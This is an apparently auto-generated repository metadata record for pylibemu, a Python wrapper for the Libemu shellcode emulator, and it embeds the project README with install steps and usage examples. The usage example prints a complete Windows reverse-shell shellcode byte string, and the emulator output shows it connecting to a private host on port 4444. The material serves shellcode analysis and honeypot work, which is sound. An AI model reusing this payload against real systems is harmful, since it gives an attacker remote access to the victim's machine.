{"id":17383761,"url":"https://github.com/buffer/pylibemu","last_synced_at":"2025-04-04T21:10:21.446Z","repository":{"id":44907880,"uuid":"1533917","full_name":"buffer/pylibemu","owner":"buffer","description":"A Libemu Cython wrapper","archived":false,"fork":false,"pushed_at":"2023-11-29T16:43:29.000Z","size":1333,"stargazers_count":126,"open_issues_count":3,"forks_count":29,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-03-28T20:09:32.947Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/buffer.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2011-03-27T20:10:35.000Z","updated_at":"2025-01-25T02:00:27.000Z","dependencies_parsed_at":"2024-04-15T22:52:47.077Z","dependency_job_id":"8639123d-c201-4fcf-95ab-36a998d922b9","html_url":"https://github.com/buffer/pylibemu","commit_stats":{"total_commits":138,"total_committers":5,"mean_commits":27.6,"dds":0.07971014492753625,"last_synced_commit":"4cec85c15917f62c876f15e9099338584fda6fae"},"previous_names":[],"tags_count":32,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/buffer","download_url":"https://codeload.github.com/buffer/pylibemu/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247249532,"owners_count":20908212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-16T07:43:42.205Z","updated_at":"2025-04-04T21:10:21.432Z","avatar_url":"https://github.com/buffer.png","language":"Python","readme":"\nPylibemu  |version badge| |downloads badge|\n============================================================================\n\n.. |version badge| image:: https://img.shields.io/pypi/v/pylibemu.svg\n   :target: https://pypi.python.org/pypi/pylibemu/\n.. |downloads badge| image:: https://img.shields.io/pypi/dm/pylibemu.svg\n   :target: https://pypi.python.org/pypi/pylibemu/\n\nPylibemu is a wrapper for the Libemu library (https://github.com/buffer/libemu).\n\n\nRequirements\n============\n\n- Python 2.5+ or Python 3.6+ (read installation notes)\n- Libemu\n\n\nInstallation (Python 3)\n=======================\n\nPylibemu \u003e 0.5.8 does not include Libemu submodule anymore so you are required to\ninstall Libemu before installing Pylibemu.\n\nTo install Libemu, just execute:\n\n.. code-block:: console\n\n    $ git clone https://github.com/buffer/libemu.git\n    $ cd libemu\n    $ autoreconf -v -i\n    $ ./configure\n    $ make\n    $ sudo make install\n\nOnce Libemu is correctly installed, just execute:\n\n.. code-block:: console\n\n    $ sudo pip install pylibemu\n\n\nInstallation (Python 2)\n=======================\n\nPylibemu 0.5.8 is the last version supporting Python 2.\n\nTo install Pylibemu, just execute:\n\n.. code-block:: console\n\n\t$ sudo pip install pylibemu==0.5.8\n\n\nUsage\n=====\n\n.. code-block:: pycon\n\n\t\u003e\u003e\u003e import pylibemu\n\t\u003e\u003e\u003e shellcode  = b\"\\xfc\\x6a\\xeb\\x47\\xe8\\xf9\\xff\\xff\\xff\\x60\\x31\\xdb\\x8b\\x7d\"\n\t\u003e\u003e\u003e shellcode += b\"\\x3c\\x8b\\x7c\\x3d\\x78\\x01\\xef\\x8b\\x57\\x20\\x01\\xea\\x8b\\x34\"\n\t\u003e\u003e\u003e shellcode += b\"\\x9a\\x01\\xee\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x84\\xc0\"\n\t\u003e\u003e\u003e shellcode += b\"\\x75\\xf6\\x43\\x66\\x39\\xca\\x75\\xe3\\x4b\\x8b\\x4f\\x24\\x01\\xe9\"\n\t\u003e\u003e\u003e shellcode += b\"\\x66\\x8b\\x1c\\x59\\x8b\\x4f\\x1c\\x01\\xe9\\x03\\x2c\\x99\\x89\\x6c\"\n\t\u003e\u003e\u003e shellcode += b\"\\x24\\x1c\\x61\\xff\\xe0\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"\n\t\u003e\u003e\u003e shellcode += b\"\\x8b\\x70\\x1c\\xad\\x8b\\x68\\x08\\x5e\\x66\\x53\\x66\\x68\\x33\\x32\"\n\t\u003e\u003e\u003e shellcode += b\"\\x68\\x77\\x73\\x32\\x5f\\x54\\x66\\xb9\\x72\\x60\\xff\\xd6\\x95\\x53\"\n\t\u003e\u003e\u003e shellcode += b\"\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\x89\\xe7\\x66\\x81\\xef\\x08\\x02\"\n\t\u003e\u003e\u003e shellcode += b\"\\x57\\x53\\x66\\xb9\\xe7\\xdf\\xff\\xd6\\x66\\xb9\\xa8\\x6f\\xff\\xd6\"\n\t\u003e\u003e\u003e shellcode += b\"\\x97\\x68\\xc0\\xa8\\x35\\x14\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe3\"\n\t\u003e\u003e\u003e shellcode += b\"\\x6a\\x10\\x53\\x57\\x66\\xb9\\x57\\x05\\xff\\xd6\\x50\\xb4\\x0c\\x50\"\n\t\u003e\u003e\u003e shellcode += b\"\\x53\\x57\\x53\\x66\\xb9\\xc0\\x38\\xff\\xe6\"\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e offset = emulator.shellcode_getpc_test(shellcode)\n\t\u003e\u003e\u003e offset\n\t4\n\t\u003e\u003e\u003e emulator.prepare(shellcode, offset)\n\t\u003e\u003e\u003e emulator.test()\n\t0\n\t\u003e\u003e\u003e print emulator.emu_profile_output\n\tHMODULE LoadLibraryA (\n     \tLPCTSTR lpFileName = 0x0012fe90 =\u003e \n           \t= \"ws2_32\";\n\t) = 0x71a10000;\n\tint WSAStartup (\n     \tWORD wVersionRequested = 2;\n     \tLPWSADATA lpWSAData = 1244272;\n\t) =  0;\n\tSOCKET WSASocket (\n     \tint af = 2;\n     \tint type = 1;\n     \tint protocol = 0;\n     \tLPWSAPROTOCOL_INFO lpProtocolInfo = 0;\n     \tGROUP g = 0;\n     \tDWORD dwFlags = 0;\n\t) =  66;\n\tint connect (\n     \tSOCKET s = 66;\n     \tstruct sockaddr_in * name = 0x0012fe88 =\u003e \n         \tstruct   = {\n            \tshort sin_family = 2;\n             \tunsigned short sin_port = 23569 (port=4444);\n             \tstruct in_addr sin_addr = {\n                unsigned long s_addr = 339060928 (host=192.168.53.20);\n             };\n             char sin_zero = \"       \";\n         };\n     \tint namelen = 16;\n\t) =  0;\n\tint recv (\n     \tSOCKET s = 66;\n     \tchar * buf = 0x0012fe88 =\u003e \n        \t none;\n     \tint len = 3072;\n     \tint flags = 0;\n\t) =  3072;\n\n\t\u003e\u003e\u003e emulator.emu_profile_truncated\n\tFalse\n\n\nThe new Emulator method 'run' was introduced in Pylibemu 0.1.3  which allows not to \nworry about details. Moreover the new Emulator attribute ``offset`` allows to get such\ninformation if needed. \n \n.. code-block:: pycon\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e emulator.run(shellcode)\n\t0\n\t\u003e\u003e\u003e emulator.offset\n\t4\n\t\u003e\u003e\u003e print emulator.emu_profile_output\n\tHMODULE LoadLibraryA (\n    \t LPCTSTR = 0x01a3f990 =\u003e \n           \t= \"ws2_32\";\n\t) =  1906376704;\n\tint WSAStartup (\n     \tWORD wVersionRequested = 2;\n     \tLPWSADATA lpWSAData = 1244272;\n\t) =  0;\n\tSOCKET WSASocket (\n     \tint af = 2;\n     \tint type = 1;\n     \tint protocol = 0;\n     \tLPWSAPROTOCOL_INFO lpProtocolInfo = 0;\n     \tGROUP g = 0;\n     \tDWORD dwFlags = 0;\n\t) =  66;\n\tint connect (\n     \tSOCKET s = 66;\n     \tstruct sockaddr_in * name = 0x0012fe88 =\u003e \n        \tstruct   = {\n            \tshort sin_family = 2;\n             \tunsigned short sin_port = 23569 (port=4444);\n             \tstruct in_addr sin_addr = {\n                unsigned long s_addr = 339060928 (host=192.168.53.20);\n             };\n             char sin_zero = \"       \";\n         };\n     int namelen = 16;\n\t) =  0;\n\tint recv (\n     \tSOCKET s = 66;\n     \tchar * = 0x01a40870 =\u003e \n         \tnone;\n     \tint len = 3072;\n     \tint flags = 0;\n\t) =  3072;\n\n\t\u003e\u003e\u003e emulator.emu_profile_truncated\n\tFalse\n\n\nThe Emulator accepts the optional parameter ``output_size`` which defines how much memory \nwill be reserved for storing the emulation profile dump. By default, its size is 1MB but \nit be can changed in two possible ways\n\n.. code-block:: pycon\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator(1024)\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e emulator.set_output_size(1024)\n\nIf the reserved memory is not enough to contain the entire dump, the dump will be truncated \nand the Emulator attribute ``emu_profile_truncated`` will be set to True. This approach is \nneeded in order not to penalize performances while analyzing some shellcodes which may produce \nseveral MBs dumps (such as the Metasploit windows/download_exec). If the entire dump is needed \na really simple approach could be to check the ``emu_profile_truncated`` attribute after the \nshellcode emulation test, increase the reserved memory through the Emulator ``set_output_size`` \nmethod and subsequently run the shellcode emulation test again as shown above.\n\n\nLicense information\n===================\n\nCopyright (C) 2011-2023 Angelo Dell'Aera \u003cbuffer@antifork.org\u003e\n\nLicense: GNU General Public License, version 2\n","funding_links":[],"categories":["Network and Artifact Analysis","\u003ca name=\"honeypots\"\u003e\u003c/a\u003e Honeypots"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fpylibemu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbuffer%2Fpylibemu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fpylibemu/lists"}